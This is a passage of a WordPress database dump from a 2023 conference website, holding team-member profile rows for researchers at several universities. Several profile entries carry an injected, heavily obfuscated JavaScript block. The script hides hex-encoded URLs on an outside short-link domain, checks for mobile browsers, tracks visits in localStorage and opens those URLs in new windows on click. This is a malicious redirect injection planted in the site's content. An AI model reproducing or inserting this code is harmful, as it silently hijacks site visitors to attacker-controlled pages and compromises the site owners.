_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 04:37:29','2022-12-06 04:37:29','',3386,'https://gsw2023.com/?p=3388',0,'revision','',0),
(3389,1,'2022-12-06 04:50:14','2022-12-06 04:50:14','<!-- wp:paragraph -->\n<p>RMIT University, Australia (WG IV/7)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Monica Wachowicz</strong>','','publish','closed','closed','','monica-wachowicz','','','2022-12-06 04:50:17','2022-12-06 04:50:17','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3389',0,'dt_team','',0),
(3390,1,'2022-12-06 04:49:19','2022-12-06 04:49:19','','w231','','inherit','open','closed','','w231','','','2022-12-06 04:49:19','2022-12-06 04:49:19','',3389,'https://gsw2023.com/wp-content/uploads/2022/12/w231.jpg',0,'attachment','image/jpeg',0),
(3391,1,'2022-12-06 04:51:57','2022-12-06 04:51:57','<!-- wp:paragraph -->\n<p>Beijing University of Civil Engineering &amp; Architecture, China (WG IV/7)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Shishuo Xu</strong>','','publish','open','closed','','shishuo-xu','','','2022-12-06 04:52:00','2022-12-06 04:52:00','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3391',0,'dt_team','',0),
(3392,1,'2022-12-06 04:50:55','2022-12-06 04:50:55','','w232','','inherit','open','closed','','w232','','','2022-12-06 04:50:55','2022-12-06 04:50:55','',3391,'https://gsw2023.com/wp-content/uploads/2022/12/w232.jpg',0,'attachment','image/jpeg',0),
(3393,1,'2022-12-06 04:53:21','2022-12-06 04:53:21','<!-- wp:paragraph -->\n<p>Politecnico di Milano, Italy (WG IV/7)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 